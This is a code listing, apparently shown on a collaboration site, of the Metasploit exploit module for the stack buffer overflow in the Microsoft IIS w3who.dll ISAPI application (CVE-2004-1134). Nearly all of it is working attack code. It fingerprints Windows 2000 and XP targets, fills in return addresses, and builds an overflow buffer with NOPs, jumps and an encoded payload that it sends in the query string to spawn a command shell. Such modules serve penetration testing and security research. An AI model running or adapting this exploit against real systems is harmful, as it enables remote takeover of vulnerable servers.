Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GoodRanking
8

9
  # XXX: Needs custom body check. HttpFingerprint = { :pattern => [ // ] }
10
  include Msf::Exploit::Remote::HttpClient
11

12
  def initialize(info = {})
13
    super(update_info(info,
14
      'Name'           => 'Microsoft IIS ISAPI w3who.dll Query String Overflow',
15
      'Description'    => %q{
16
          This module exploits a stack buffer overflow in the w3who.dll ISAPI
17
        application. This vulnerability was discovered Nicolas
18
        Gregoire and this code has been successfully tested against
19
        Windows 2000 and Windows XP (SP2). When exploiting Windows
20
        XP, the payload must call RevertToSelf before it will be
21
        able to spawn a command shell.
22

23
      },
24
      'Author'         => [ 'hdm' ],
25
      'License'        => MSF_LICENSE,
26
      'References'     =>
27
        [
28
          [ 'CVE', '2004-1134' ],
29
          [ 'OSVDB', '12258' ],
30
          [ 'URL', 'http://www.exaprobe.com/labs/advisories/esa-2004-1206.html' ],
31
          [ 'BID', '11820' ]
32
        ],
33
      'Privileged'     => false,
34
      'DefaultOptions' =>
35
        {
36
          'EXITFUNC' => 'process',
37
        },
38
      'Payload'        =>
39
        {
40
          'Space'    => 632,
41
          'BadChars' => "\x00\x2b\x26\x3d\x25\x0a\x0d\x20",
42
          'MinNops'  => 128,
43
          'StackAdjustment' => -3500,
44

45
        },
46
      'Platform'       => 'win',
47
      'Targets'        =>
48
        [
49
          ['Automatic Detection', { }],
50
          ['Windows 2000 RESKIT DLL [Windows 2000]', { 'Rets' => [  48,  0x01169f4a ] }], # pop, pop, ret magic
51
          ['Windows 2000 RESKIT DLL [Windows XP]',   { 'Rets' => [ 748,  0x10019f4a ] }], # pop, pop, ret magic
52
        ],
53
      'DefaultTarget'  => 0,
54
      'DisclosureDate' => '2004-12-06'))
55

56
    register_options(
57
      [
58
        OptString.new('URL', [ true,  "The path to w3who.dll", "/scripts/w3who.dll" ]),
59
      ])
60
  end
61

62
  def auto_target
63

64
    res = send_request_raw(
65
      {
66
        'uri'   => normalize_uri(datastore['URL'])
67
      }, -1)
68
    http_fingerprint({ :response => res })  # XXX: Needs custom body match
69

70
    # Was a vulnerable system detected?
71
    t = nil
72
    if (res and res.body =~ /Access Token/)
73
      case res.headers['Server']
74
      when /5\.1/
75
        t = targets[2]
76
      else
77
        t = targets[1]
78
      end
79
    end
80
    t
81
  end
82

83
  def check
84
    if auto_target
85
      return Exploit::CheckCode::Appears
86
    end
87
    Exploit::CheckCode::Safe
88
  end
89

90
  def exploit
91

92
    if (target.name =~ /Automatic/)
93
      mytarget = auto_target
94
    else
95
      mytarget = target
96
    end
97

98
    if not mytarget
99
      fail_with(Failure::NoTarget, "No valid target found")
100
    end
101

102
    buf = rand_text_english(8192, payload_badchars)
103
    buf[mytarget['Rets'][0] - 4, 4] = make_nops(2) + "\xeb\x04"
104
    buf[mytarget['Rets'][0] - 0, 4] = [ mytarget['Rets'][1] ].pack('V')
105
    buf[mytarget['Rets'][0] + 4, 4] = "\xe9" + [-641].pack('V')
106
    buf[mytarget['Rets'][0] - 4 - payload.encoded.length, payload.encoded.length] = payload.encoded
107

108
    print_status("Sending request...")
109
    r = send_request_raw({
110
      'uri'   => normalize_uri(datastore['URL']),
111
      'query' => buf
112
    }, 5)
113

114
    handler
115
  end
116
end
117

118